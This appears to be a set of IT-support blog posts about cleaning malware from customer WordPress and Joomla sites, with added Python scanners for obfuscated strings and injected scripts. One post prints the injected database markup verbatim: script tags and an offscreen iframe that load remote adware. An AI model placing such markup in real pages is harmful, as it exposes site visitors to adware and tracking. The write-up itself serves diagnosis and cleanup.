WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.

[Image: dr_blum_homepage_blocked_infection_small]

They were running the WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
  • /wp-content/plugins/si-contact-form/includes/class-fscf-process.php


This link provided me with some detail. There was code that looked like "\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72",

Deleting this out is supposed to help.

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html
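As an added example (not code from the original post or from the affected plugins), here is a small Python scanner that decodes the kind of hex-escaped string array quoted above; those escapes decode to sc_co, getElementById, colorDepth, width, height, charset, location and referrer, which are visitor-fingerprinting names. The sample string and the scan path are constructed for illustration.

```python
import os
import re

# Constructed sample modelled on the escaped literal quoted in the post;
# it is not a copy of the infected plugin files.
SAMPLE_JS = (
    'var _0x=["\\x73\\x63\\x5F\\x63\\x6F",'
    '"\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64",'
    '"\\x63\\x6F\\x6C\\x6F\\x72\\x44\\x65\\x70\\x74\\x68","\\x77\\x69\\x64\\x74\\x68",'
    '"\\x68\\x65\\x69\\x67\\x68\\x74","\\x63\\x68\\x61\\x72\\x73\\x65\\x74",'
    '"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E","\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72"];'
)

# A quoted literal made entirely of \xHH escapes; legitimate code rarely
# spells plain identifiers this way, so it is a good trigger for a closer look.
HEX_LITERAL = re.compile(r'''["']((?:\\x[0-9A-Fa-f]{2})+)["']''')
HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')

# Browser/visitor fingerprinting names that the quoted sample decodes to.
FINGERPRINT_NAMES = {"getElementById", "colorDepth", "width", "height",
                     "charset", "location", "referrer"}


def decode_hex_strings(text):
    """Return every fully hex-escaped string literal in text, decoded."""
    return [HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), lit)
            for lit in HEX_LITERAL.findall(text)]


def fingerprint_hits(decoded):
    """Which decoded strings are known fingerprinting property names."""
    return sorted(FINGERPRINT_NAMES.intersection(decoded))


def scan_tree(root, exts=(".php", ".js")):
    """Walk a plugin/theme tree and report files whose hex literals decode
    to fingerprinting names. Returns {path: [decoded strings]}."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                decoded = decode_hex_strings(fh.read())
            if fingerprint_hits(decoded):
                findings[path] = decoded
    return findings


if __name__ == "__main__":
    print(decode_hex_strings(SAMPLE_JS))
    print(scan_tree("wp-content/plugins"))  # run from the WordPress docroot
```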


WordPress site infected with CouponDropDown Adware

Customer's WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn't cause a problem. On one page there were banner ads showing up.

[Image: lawyer_website_xxs]

The issue turned out to be a form of cross-site scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id="__tbSetup"></div>

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>
<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit"></script>
<script id="__changoScript" type="text/javascript">// <![CDATA[
var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();
// ]]></script>
<script id="__simpliScript" type="text/javascript" src="http://i.simpli.fi/dpx.js?cid=3065&amp;m=1" data-sifi-parsed="true"></script>
<script type="text/javascript" src="http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
<script type="text/javascript" src="http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp"></script>
<iframe id="l3adg3n-xdm" style="position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;" src="http://www.vitruvianleads.com/build/xdm.html" width="320" height="240"></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page it was affecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.
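An added example, not the author's own procedure: a Python audit of wp_posts-shaped rows that flags external script and iframe sources and maps each revision back to its parent post, which is the step the post above does by hand for entry 361. The rows and the site hostname example.com are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed rows in the shape of wp_posts (ID, post_parent, post_type,
# post_content). The injected tags are trimmed from the markup quoted above.
ROWS = [
    (361, 0, "post", '<p>About</p><div id="__tbSetup"></div>'
     '<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js"></script>'),
    (362, 361, "revision", "<p>About</p>"),
    (363, 361, "revision", '<p>About</p><script src="http://i.simpli.fi/dpx.js?cid=3065"></script>'),
    (370, 0, "post", '<p>Contact</p><script src="/wp-includes/js/jquery/jquery.js"></script>'
     '<iframe src="https://example.com/map"></iframe>'),
]
OWN_HOST = "example.com"  # constructed stand-in for the site's own hostname

# src attribute of any <script> or <iframe> tag (the offscreen iframe above counts too)
SRC_ATTR = re.compile(r'<(?:script|iframe)\b[^>]*\bsrc=["\']([^"\']+)["\']', re.I)


def external_hosts(html, own_host):
    """Hosts of <script>/<iframe> src values that do not belong to the site."""
    hosts = set()
    for src in SRC_ATTR.findall(html):
        host = urlparse(src).hostname      # None for relative paths
        if host and host != own_host:
            hosts.add(host)
    return sorted(hosts)


def audit_posts(rows, own_host):
    """Group hits by the post they belong to, so revisions point back at
    their parent. Returns {parent_id: [(row_id, post_type, hosts), ...]}."""
    hits = defaultdict(list)
    for row_id, parent, post_type, content in rows:
        hosts = external_hosts(content, own_host)
        if hosts:
            owner = parent if post_type == "revision" else row_id
            hits[owner].append((row_id, post_type, hosts))
    return dict(hits)


if __name__ == "__main__":
    # Equivalent rows can be pulled from a live site with:
    #   SELECT ID, post_parent, post_type, post_content FROM wp_posts
    #   WHERE post_content LIKE '%<script%' OR post_content LIKE '%<iframe%';
    for parent, entries in audit_posts(ROWS, OWN_HOST).items():
        print(parent, entries)
```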

I hope this helps someone else.


Solved Internet Explorer won’t open – EMET 5.0 conflict

We have a customer that must use Internet Explorer for their work software. It is how they log in, punch their time clocks, and perform sales. Well, Internet Explorer suddenly stopped working.

The first time, I uninstalled IE, and this worked for a short time. The real issue turned out to be that EMET 5.0 was preventing it from running.

The solution was to uninstall EMET 5.0, download 5.1, and install it. Everything worked after that.

I hope this helps someone else.

Malwarebytes trial expired box pops up in taskbar.

Client started getting a Malwarebytes pop-up next to their clock in the system tray. Worried about this being malware itself, I didn't click on it. I uninstalled the version of Malwarebytes that was currently installed and reinstalled a newly downloaded free version.

I also ran CCleaner to clean the registry. It didn't find anything related to Malwarebytes. I then re-installed Malwarebytes.

What I should have done is described in this forum post. Malwarebytes makes a cleaner for uninstalling their product. If the customer continues to get the pop-up, I will log back in and uninstall the current version >> run the cleaner >> re-install a new download of Malwarebytes. Below is the link I found.

https://forums.malwarebytes.org/index.php?/topic/113042-malwarebytes-trial-version-expired-message/

I hope this helps someone else.

ip:184.154.224.12 joomla in my Google Analytics organic search traffic.

Today I noticed "ip:184.154.224.12 joomla" as an organic keyword search in my Google Analytics account. Here is what I did next.

      1. Put the whole "ip:184.154.224.12 joomla" in the URL bar and hit enter. The browser didn't recognize the "ip:" part. When I deleted it and hit enter again, this didn't get me much.

      2. I googled "ip:184.154.224.12 joomla". The top result led me to http://sameid.net/ip/184.154.224.12/3/. Here I was looking for my site but saw a customer's site. I verified the analytics number and they matched.

The site shows how the other sites are built. I could easily see other Joomla and WordPress sites. Curious if this info is used by hackers to go after these types of sites.

I found another customer’s site.


How strong should I make my passwords?

I have recently tried some password cracking tools. These programs are very good at cracking a password. They can tell the user how long it could take. Simple dictionary words and numbers can take a few minutes. As soon as you add punctuation and special characters that number jumps to days. More characters make it jump even more.

Passphrases are better. Here is an example: Be here @8!

Basic tips for good passwords are as follows.

  • Minimum of 8 characters.
  • Capitalize a character or two.
  • Add special characters.
  • Avoid dictionary words.
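As an added illustration of the estimate described above (not output from any cracking tool), the Python below classifies a password's character set, computes the brute-force keyspace, and checks the four tips; the guess rate and the word list are assumed values chosen for the example.

```python
import string

# Character classes a brute-force cracker has to cover. The guess rate is an
# assumed figure for illustration, not the output of any particular tool.
CLASSES = [string.ascii_lowercase, string.ascii_uppercase, string.digits,
           string.punctuation + " "]
GUESSES_PER_SECOND = 1_000_000_000
# Constructed mini word list standing in for a cracker's dictionary.
WORDLIST = {"password", "welcome", "letmein", "dragon"}


def charset_size(password):
    """Alphabet size implied by the classes the password actually uses."""
    return sum(len(cls) for cls in CLASSES if any(c in cls for c in password))


def crack_time_seconds(password, rate=GUESSES_PER_SECOND):
    """Worst-case time to exhaust the keyspace at the assumed rate."""
    if password.lower() in WORDLIST:
        return len(WORDLIST) / rate   # a dictionary hit is found almost at once
    return charset_size(password) ** len(password) / rate


def passes_tips(password):
    """The four tips from the list above, as a checklist."""
    return {
        "min_8_chars": len(password) >= 8,
        "has_capital": any(c.isupper() for c in password),
        "has_special": any(c in CLASSES[3] for c in password),
        "not_dictionary_word": password.lower() not in WORDLIST,
    }


def describe(password):
    """One-line summary: keyspace and estimated time in a readable unit."""
    secs = crack_time_seconds(password)
    unit = "seconds" if secs < 3600 else "hours" if secs < 86400 else "days"
    scaled = secs / {"seconds": 1, "hours": 3600, "days": 86400}[unit]
    return f"{password!r}: {charset_size(password)}^{len(password)} keyspace, ~{scaled:,.1f} {unit}"


if __name__ == "__main__":
    for pw in ("password", "passw0rd", "Passw0rd!", "Be here @8!"):
        print(describe(pw), passes_tips(pw))
```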

Zip Opener / Trojan Virus – download

While trying to learn BackTrack I somehow clicked on something that initiated a download of ZipOpenerSetup.exe. The AVG antivirus caught a trojan. Here are the pages I was on:

http://www.backtrack-linux.org/downloads/

I was downloading several items, so when an installer popped up I chose to run it. That's when AVG jumped in. I wondered why I was installing a zip program; I already have several. I canceled the install and it took me to this page.

http://www.thenewzipopenerfun.com/gb/uninstall/?sr=gb&lp=sag&cc=US&c=1

http://www.thenewzipopenerfun.com/

By using the URL above I found where to download the software I am labeling as malware.

Beware of what downloads you click on!

When googling "ZipOpener malware" I found some people had/have issues with this, and I didn't find a page to download it. I was either careless with my mouse clicks, it could be cross-site scripting, or it could have been something else.

To top it all off, I realized it left a desktop icon so I would complete the installation.

[Image: zip_opener_continute_icon]

I ran a Malwarebytes scan and it returned 7 items it found as known threats, and the Zip Opener reinstaller was one of them. There were also some other exe files.

[Image: zip_opener_malware_bytes]

Be careful out there.

More info:
http://thundercloud.net/infoave/new/be-very-careful-when-downloading-slow-down-read-be-wary-and-take-your-time/


"iolanipalace.org" and "Pay Day Loans" text showed up in my Joomla 1.5 template

I am starting another Joomla 1.5.23 upgrade to 2.5 for security reasons. Before I started I noticed a "payday loans" hyperlink going to "iolanipalace.org".

[Image: payday_loan]

This was not a module area; it was in the index.php file in the template. I went to the template to see the added text. I highlighted the text in blue.

[Image: payday_loan_code]

I googled "iolanipalace.org" and came up with a link I didn't want to click on.

516Cash: UK Payday Loans
www.516cash.com/
UK Payday Loans from 516cash. Up to £1000 in 15 minutes! Instant Approval! No Transfer Fees, Apply Now!


Seems like a scam lead through cross-site scripting. I am hoping the damage isn't severe.

Upgrade your Joomla 1.5 sites before it is too late.


Hackeado por HighTech Brazil HackTeam hit one of my Joomla 1.5 sites

While backing up a customer's site to prepare for a new Joomla 2.5 site to be installed, I noticed a file called "xk.txt" in the root directory. I opened the file to see only the following text.

Hackeado por HighTech Brazil HackTeam
No\One – CrazyDuck – Otrasher

I am not going to repair this site because I am already upgrading it. Good reason to suggest that any existing customers you may have with a Joomla 1.5 site upgrade, or at least back up, as soon as possible.

More info on the Joomla Sejeal attack

I have another client's site attacked by Sejeal. Again I found a "sejeal.JPG" file in the root directory. The client called me saying the hyperlinks don't work. The browser was returning a 404 error.

I found this article that shed some light on the matter. One of my main tools, "JCEditor", has a vulnerability that attackers are exploiting.

http://www.prolateral.com/news-section/news-news/289-has-your-joomla-website-been-hacked.html